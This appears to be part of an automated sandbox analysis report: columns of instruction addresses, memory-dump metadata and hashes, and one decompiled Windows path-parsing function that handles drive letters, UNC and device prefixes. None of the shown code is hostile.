                                                                                            0x04da5c5b
                                                                                            0x04da5c2c
                                                                                            0x04da5cb7
                                                                                            0x04da5cb9
                                                                                            0x04da5cbf
                                                                                            0x04da5cc2
                                                                                            0x04da5cca
                                                                                            0x04da5ccb
                                                                                            0x04da5ccb
                                                                                            0x04da5cd1
                                                                                            0x04da5cd7
                                                                                            0x04da5cda
                                                                                            0x04da5ce1
                                                                                            0x04da5ce4
                                                                                            0x04da5ce7
                                                                                            0x04da5ced
                                                                                            0x04da5cf3
                                                                                            0x04da5cf9
                                                                                            0x04da5cff
                                                                                            0x04da5d08
                                                                                            0x04da5d0a
                                                                                            0x04da5d0e
                                                                                            0x04da5d10
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04da5d16
                                                                                            0x04da5d1a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04da5d20
                                                                                            0x04da5d22
                                                                                            0x04da5d25
                                                                                            0x04da5d2f
                                                                                            0x04da5d2f
                                                                                            0x04da5d33
                                                                                            0x04da5d3d
                                                                                            0x04da5d49
                                                                                            0x04da5d4b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04da5d5a
                                                                                            0x04da5d5d
                                                                                            0x04da5d60
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04da5d66
                                                                                            0x04da5d69
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04da5d6f
                                                                                            0x04da5d6f
                                                                                            0x04da5d73
                                                                                            0x04da5d79
                                                                                            0x04da5d7f
                                                                                            0x04da5d86
                                                                                            0x04da5d95
                                                                                            0x04da5d98
                                                                                            0x04da5dba
                                                                                            0x04da5dcb
                                                                                            0x04da5dce
                                                                                            0x04da5dd3
                                                                                            0x04da5dd6
                                                                                            0x04da5dd8
                                                                                            0x04da5de6
                                                                                            0x04da5dec
                                                                                            0x04da5dee
                                                                                            0x04da5df1
                                                                                            0x04da5df3
                                                                                            0x04da635a
                                                                                            0x04da635a
                                                                                            0x00000000
                                                                                            0x04da635a
                                                                                            0x04da5dfe
                                                                                            0x04da5e02
                                                                                            0x04da5e05
                                                                                            0x04da5e07
                                                                                            0x04da5e10
                                                                                            0x04da5e13
                                                                                            0x04da5e1b
                                                                                            0x04da5e1c
                                                                                            0x04da5e21
                                                                                            0x04da5e22
                                                                                            0x04da5e23
                                                                                            0x04da5e25
                                                                                            0x04da5e2a
                                                                                            0x04da5e2c
                                                                                            0x04da5e2e
                                                                                            0x04da5e36
                                                                                            0x04da5e39
                                                                                            0x04da5e42
                                                                                            0x04da5e47
                                                                                            0x04da5e4d
                                                                                            0x04da5e54
                                                                                            0x04da5e54
                                                                                            0x04da5e54
                                                                                            0x04da5e2e
                                                                                            0x04da5e5c
                                                                                            0x04da5e5f
                                                                                            0x04da5e62
                                                                                            0x04da5e64
                                                                                            0x04da5e6b
                                                                                            0x04da5e70
                                                                                            0x04da5e7a
                                                                                            0x04da5e7a
                                                                                            0x04da5e7a
                                                                                            0x04da5e6b
                                                                                            0x04da5e7e
                                                                                            0x04da5e7f
                                                                                            0x04da5e7f
                                                                                            0x04da5e81
                                                                                            0x04da5e87
                                                                                            0x04da5e8b
                                                                                            0x04da5e8c
                                                                                            0x04da5e8c
                                                                                            0x04da5e8c
                                                                                            0x04da5e9a
                                                                                            0x04da5e9c
                                                                                            0x04da5ea2
                                                                                            0x04da5ea6
                                                                                            0x04da5f50
                                                                                            0x04da5f50
                                                                                            0x04da5f57
                                                                                            0x04da5f66
                                                                                            0x04da5f66
                                                                                            0x04da5f66
                                                                                            0x04da5f68
                                                                                            0x04da5f6a
                                                                                            0x04da63d0
                                                                                            0x00000000
                                                                                            0x04da5f70
                                                                                            0x04da5f70
                                                                                            0x04da5f91
                                                                                            0x04da5f9c
                                                                                            0x04da5f9e
                                                                                            0x04da5fa4
                                                                                            0x04da5fa6
                                                                                            0x04da638c
                                                                                            0x04da6392
                                                                                            0x04da63a1
                                                                                            0x04da63a7
                                                                                            0x04da63af
                                                                                            0x04da63af
                                                                                            0x04da63bd
                                                                                            0x04da63d8
                                                                                            0x00000000
                                                                                            0x04da63d8
                                                                                            0x04da5fac
                                                                                            0x04da5fb2
                                                                                            0x04da5fb4
                                                                                            0x04da5fbd
                                                                                            0x04da5fc6
                                                                                            0x04da5fce
                                                                                            0x04da5fd4
                                                                                            0x04da5fdc
                                                                                            0x04da5fec
                                                                                            0x04da5fed
                                                                                            0x04da5fee
                                                                                            0x04da5fef
                                                                                            0x04da5ff9
                                                                                            0x04da5ffa
                                                                                            0x04da5ffb
                                                                                            0x04da5ffc
                                                                                            0x04da6000
                                                                                            0x04da6004
                                                                                            0x04da6012
                                                                                            0x04da6012
                                                                                            0x04da6018
                                                                                            0x04da6019
                                                                                            0x04da601a
                                                                                            0x04da601b
                                                                                            0x04da601c
                                                                                            0x04da6020
                                                                                            0x04da6059
                                                                                            0x04da605c
                                                                                            0x04da6061
                                                                                            0x04da6061
                                                                                            0x04da6022
                                                                                            0x04da6022
                                                                                            0x04da6022
                                                                                            0x04da6025
                                                                                            0x04da602a
                                                                                            0x04da602b
                                                                                            0x04da6031
                                                                                            0x04da6037
                                                                                            0x04da6038
                                                                                            0x04da603e
                                                                                            0x04da6048
                                                                                            0x04da6049
                                                                                            0x04da604a
                                                                                            0x04da604b
                                                                                            0x04da604c
                                                                                            0x04da604d
                                                                                            0x04da6053
                                                                                            0x04da6054
                                                                                            0x04da6054
                                                                                            0x04da6062
                                                                                            0x04da6065
                                                                                            0x04da6067
                                                                                            0x04da606a
                                                                                            0x04da6070
                                                                                            0x04da6075
                                                                                            0x04da6076
                                                                                            0x04da6081
                                                                                            0x04da6087
                                                                                            0x04da6095
                                                                                            0x04da6099
                                                                                            0x04da609e
                                                                                            0x04da60a4
                                                                                            0x04da60ae
                                                                                            0x04da60b0
                                                                                            0x04da60b3
                                                                                            0x04da60b6
                                                                                            0x04da60b8
                                                                                            0x04da60ba
                                                                                            0x04da60ba
                                                                                            0x04da60ba
                                                                                            0x04da60ba
                                                                                            0x04da60be
                                                                                            0x04da60c0
                                                                                            0x04da60c5
                                                                                            0x04da60c5
                                                                                            0x04da60c5
                                                                                            0x04da60c6
                                                                                            0x04da60cd
                                                                                            0x04da6114
                                                                                            0x04da60cf
                                                                                            0x04da60cf
                                                                                            0x04da60d4
                                                                                            0x04da60d5
                                                                                            0x04da60da
                                                                                            0x04da60db
                                                                                            0x04da60e1
                                                                                            0x04da60e2
                                                                                            0x04da60e8
                                                                                            0x04da60f8
                                                                                            0x04da60fd
                                                                                            0x04da60fe
                                                                                            0x04da6102
                                                                                            0x04da6104
                                                                                            0x04da6107
                                                                                            0x04da6109
                                                                                            0x04da610b
                                                                                            0x04da610b
                                                                                            0x04da610b
                                                                                            0x04da610b
                                                                                            0x04da610f
                                                                                            0x04da610f
                                                                                            0x04da6117
                                                                                            0x04da611a
                                                                                            0x04da611f
                                                                                            0x04da6125
                                                                                            0x04da6134
                                                                                            0x04da6139
                                                                                            0x04da613f
                                                                                            0x04da6146
                                                                                            0x04da6148
                                                                                            0x04da614b
                                                                                            0x04da614d
                                                                                            0x04da614f
                                                                                            0x04da614f
                                                                                            0x04da614f
                                                                                            0x04da614f
                                                                                            0x04da6153
                                                                                            0x04da6159
                                                                                            0x04da6159
                                                                                            0x04da615c
                                                                                            0x04da6163
                                                                                            0x04da6169
                                                                                            0x04da616c
                                                                                            0x04da6172
                                                                                            0x04da6181
                                                                                            0x04da6186
                                                                                            0x04da6187
                                                                                            0x04da618b
                                                                                            0x04da6191
                                                                                            0x04da6195
                                                                                            0x04da61a3
                                                                                            0x04da61bb
                                                                                            0x04da61c0
                                                                                            0x04da61c3
                                                                                            0x04da61cc
                                                                                            0x04da61d0
                                                                                            0x04da61dc
                                                                                            0x04da61de
                                                                                            0x04da61e1
                                                                                            0x04da61e4
                                                                                            0x04da61e6
                                                                                            0x04da61e8
                                                                                            0x04da61e8
                                                                                            0x04da61e8
                                                                                            0x04da61e8
                                                                                            0x04da61e6
                                                                                            0x04da61ec
                                                                                            0x04da61f3
                                                                                            0x04da6203
                                                                                            0x04da6209
                                                                                            0x04da620a
                                                                                            0x04da6216
                                                                                            0x04da621d
                                                                                            0x04da6227
                                                                                            0x04da6241
                                                                                            0x04da6246
                                                                                            0x04da624c
                                                                                            0x04da6257
                                                                                            0x04da6259
                                                                                            0x04da625c
                                                                                            0x04da625e
                                                                                            0x04da6260
                                                                                            0x04da6260
                                                                                            0x04da6260
                                                                                            0x04da6260
                                                                                            0x04da625e
                                                                                            0x04da6264
                                                                                            0x04da6267
                                                                                            0x04da6269
                                                                                            0x04da6315
                                                                                            0x04da6315
                                                                                            0x04da631b
                                                                                            0x04da631e
                                                                                            0x04da6324
                                                                                            0x04da6327
                                                                                            0x04da632f
                                                                                            0x04da6330
                                                                                            0x04da6333
                                                                                            0x04da633a
                                                                                            0x04da633c
                                                                                            0x04da6335
                                                                                            0x04da6335
                                                                                            0x04da6335
                                                                                            0x04da633f
                                                                                            0x04da6342
                                                                                            0x04da634c
                                                                                            0x04da6352
                                                                                            0x04da6355
                                                                                            0x04da6355
                                                                                            0x04da6359
                                                                                            0x00000000
                                                                                            0x04da626f
                                                                                            0x04da6275
                                                                                            0x04da6275
                                                                                            0x04da6278
                                                                                            0x04da627e
                                                                                            0x04da627e
                                                                                            0x04da6281
                                                                                            0x04da6287
                                                                                            0x04da628d
                                                                                            0x04da6298
                                                                                            0x04da629c
                                                                                            0x04da62a2
                                                                                            0x04da629e
                                                                                            0x04da629e
                                                                                            0x04da629e
                                                                                            0x04da62a7
                                                                                            0x04da62a7
                                                                                            0x04da62aa
                                                                                            0x04da62b0
                                                                                            0x04da62f0
                                                                                            0x04da62f0
                                                                                            0x04da62f2
                                                                                            0x04da62f8
                                                                                            0x04da62fd
                                                                                            0x04da62b2
                                                                                            0x04da62b2
                                                                                            0x04da62b2
                                                                                            0x04da62b5
                                                                                            0x04da62dd
                                                                                            0x04da62e2
                                                                                            0x04da62e5
                                                                                            0x04da62b7
                                                                                            0x04da62b8
                                                                                            0x04da62bb
                                                                                            0x04da62bd
                                                                                            0x04da62c0
                                                                                            0x04da62c4
                                                                                            0x04da62cd
                                                                                            0x04da62cd
                                                                                            0x04da62c0
                                                                                            0x04da62bb
                                                                                            0x04da62b5
                                                                                            0x04da6302
                                                                                            0x04da6303
                                                                                            0x04da6305
                                                                                            0x04da6305
                                                                                            0x04da6305
                                                                                            0x04da630c
                                                                                            0x04da630c
                                                                                            0x00000000
                                                                                            0x04da627e
                                                                                            0x04da6269
                                                                                            0x04da5eac
                                                                                            0x04da5ebb
                                                                                            0x04da5ebe
                                                                                            0x04da5ecb
                                                                                            0x04da5ecb
                                                                                            0x04da5ece
                                                                                            0x04da5ece
                                                                                            0x04da5ed4
                                                                                            0x04da5ed7
                                                                                            0x04da5ed9
                                                                                            0x04da5edb
                                                                                            0x04da5edb
                                                                                            0x04da5ee1
                                                                                            0x04da5ee1
                                                                                            0x04da5ee3
                                                                                            0x04da5f20
                                                                                            0x04da5f20
                                                                                            0x04da5ee5
                                                                                            0x04da5ee5
                                                                                            0x04da5ee5
                                                                                            0x04da5ee8
                                                                                            0x04da5f11
                                                                                            0x04da5f18
                                                                                            0x04da5eea
                                                                                            0x04da5eea
                                                                                            0x04da5eed
                                                                                            0x04da5ef2
                                                                                            0x04da5ef8
                                                                                            0x04da5efb
                                                                                            0x04da5f0a
                                                                                            0x04da5f0a
                                                                                            0x04da5eed
                                                                                            0x04da5ee8
                                                                                            0x04da5f22
                                                                                            0x04da5f28
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04da5f30
                                                                                            0x04da5f31
                                                                                            0x04da5f37
                                                                                            0x04da5f3a
                                                                                            0x04da5f3d
                                                                                            0x04da5f44
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04da5f46
                                                                                            0x04da5f48
                                                                                            0x04da5f4d
                                                                                            0x00000000
                                                                                            0x04da5f4d
                                                                                            0x04da5dda
                                                                                            0x04da5ddf
                                                                                            0x00000000
                                                                                            0x04da5ddf
                                                                                            0x04da5dd8
                                                                                            0x04da5da7
                                                                                            0x04da5da9
                                                                                            0x04da5dac
                                                                                            0x04da5dae
                                                                                            0x00000000
                                                                                            0x04da5db4
                                                                                            0x04da5db4
                                                                                            0x00000000
                                                                                            0x04da5db4
                                                                                            0x04da5dae
                                                                                            0x04da5d88
                                                                                            0x04da5d8d
                                                                                            0x04da6363
                                                                                            0x04da6369
                                                                                            0x04da636a
                                                                                            0x04da6370
                                                                                            0x04da6372
                                                                                            0x04da637a
                                                                                            0x04da637b
                                                                                            0x04da637d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04da637f
                                                                                            0x04da6385
                                                                                            0x00000000
                                                                                            0x04da6385
                                                                                            0x04da5d38
                                                                                            0x04da5d3b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04da5d3b
                                                                                            0x04da5d27
                                                                                            0x04da5d29
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04da6360
                                                                                            0x00000000
                                                                                            0x04da6360
                                                                                            0x04da5c10
                                                                                            0x04da5c10
                                                                                            0x04da63da
                                                                                            0x04da63e5
                                                                                            0x04da63e5

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6049eb81a92fe4afbf01c690a89eb47cf81b2dd4cdf36f12e84462db4a264817
                                                                                            • Instruction ID: 146e638d86512e38ba3c658a4eb55d07f7a712093c3affef43b5e9a1eaf827d9
                                                                                            • Opcode Fuzzy Hash: 6049eb81a92fe4afbf01c690a89eb47cf81b2dd4cdf36f12e84462db4a264817
                                                                                            • Instruction Fuzzy Hash: CA425E75A00229DFDB24CF68C890BA9B7B1FF45304F1981AAD94DEB241E734E995CF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CF4120, Relevance: .4, Instructions: 444COMMONCrypto
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 92%
                                                                                            			E04CF4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x4dcd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E04D0F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04CF6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04CF4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04CF6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M04CF45F8))) {
												case 0:
													_v568 = 0x4cb1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x4cb11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04CF4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E04D1F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E04D1F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E04CD52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E04CEEB70(1, 0x4dc79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E04CEAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E04D195D0();
																			L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E04D1B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04D13D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E04D1B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                                            0x04cf4128
                                                                                            0x04cf4135
                                                                                            0x04cf413c
                                                                                            0x04cf4141
                                                                                            0x04cf4145
                                                                                            0x04cf4147
                                                                                            0x04cf414e
                                                                                            0x04cf4151
                                                                                            0x04cf4159
                                                                                            0x04cf415c
                                                                                            0x04cf4160
                                                                                            0x04cf4164
                                                                                            0x04cf4168
                                                                                            0x04cf416c
                                                                                            0x04cf417f
                                                                                            0x04cf4181
                                                                                            0x04cf446a
                                                                                            0x04cf446a
                                                                                            0x04cf418c
                                                                                            0x04cf4195
                                                                                            0x04cf4199
                                                                                            0x04cf4432
                                                                                            0x04cf4439
                                                                                            0x04cf443d
                                                                                            0x04cf4442
                                                                                            0x04cf4447
                                                                                            0x00000000
                                                                                            0x04cf419f
                                                                                            0x04cf41a3
                                                                                            0x04cf41b1
                                                                                            0x04cf41b9
                                                                                            0x04cf41bd
                                                                                            0x04cf45db
                                                                                            0x04cf45db
                                                                                            0x00000000
                                                                                            0x04cf41c3
                                                                                            0x04cf41c3
                                                                                            0x04cf41ce
                                                                                            0x04cf41d4
                                                                                            0x04d3e138
                                                                                            0x04d3e13e
                                                                                            0x04d3e169
                                                                                            0x04d3e16d
                                                                                            0x04d3e19e
                                                                                            0x04d3e16f
                                                                                            0x04d3e16f
                                                                                            0x04d3e175
                                                                                            0x04d3e179
                                                                                            0x04d3e18f
                                                                                            0x04d3e193
                                                                                            0x00000000
                                                                                            0x04d3e199
                                                                                            0x00000000
                                                                                            0x04d3e199
                                                                                            0x04d3e193
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cf41da
                                                                                            0x04cf41da
                                                                                            0x04cf41df
                                                                                            0x04cf41e4
                                                                                            0x04cf41ec
                                                                                            0x04cf4203
                                                                                            0x04cf4207
                                                                                            0x04d3e1fd
                                                                                            0x04cf4222
                                                                                            0x04cf4226
                                                                                            0x04d3e1f3
                                                                                            0x04d3e1f3
                                                                                            0x04cf422c
                                                                                            0x04cf422c
                                                                                            0x04cf4233
                                                                                            0x04d3e1ed
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cf4239
                                                                                            0x04cf4239
                                                                                            0x04cf4239
                                                                                            0x04cf4239
                                                                                            0x04cf4233
                                                                                            0x04cf4226
                                                                                            0x04cf41ee
                                                                                            0x04cf41ee
                                                                                            0x04cf41f4
                                                                                            0x04cf4575
                                                                                            0x04d3e1b1
                                                                                            0x04d3e1b1
                                                                                            0x00000000
                                                                                            0x04cf457b
                                                                                            0x04cf457b
                                                                                            0x04cf4582
                                                                                            0x04d3e1ab
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cf4588
                                                                                            0x04cf4588
                                                                                            0x04cf458c
                                                                                            0x04d3e1c4
                                                                                            0x04d3e1c4
                                                                                            0x00000000
                                                                                            0x04cf4592
                                                                                            0x04cf4592
                                                                                            0x04cf4599
                                                                                            0x04d3e1be
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cf459f
                                                                                            0x04cf459f
                                                                                            0x04cf45a3
                                                                                            0x04d3e1d7
                                                                                            0x04d3e1e4
                                                                                            0x00000000
                                                                                            0x04cf45a9
                                                                                            0x04cf45a9
                                                                                            0x04cf45b0
                                                                                            0x04d3e1d1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cf45b6
                                                                                            0x04cf45b6
                                                                                            0x04cf45b6
                                                                                            0x00000000
                                                                                            0x04cf45b6
                                                                                            0x04cf45b0
                                                                                            0x04cf45a3
                                                                                            0x04cf4599
                                                                                            0x04cf458c
                                                                                            0x04cf4582
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cf41f4
                                                                                            0x04cf423e
                                                                                            0x04cf4241
                                                                                            0x04cf45c0
                                                                                            0x04cf45c4
                                                                                            0x00000000
                                                                                            0x04cf45ca
                                                                                            0x04cf45ca
                                                                                            0x00000000
                                                                                            0x04d3e207
                                                                                            0x04d3e20f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cf45d1
                                                                                            0x00000000
                                                                                            0x00000000
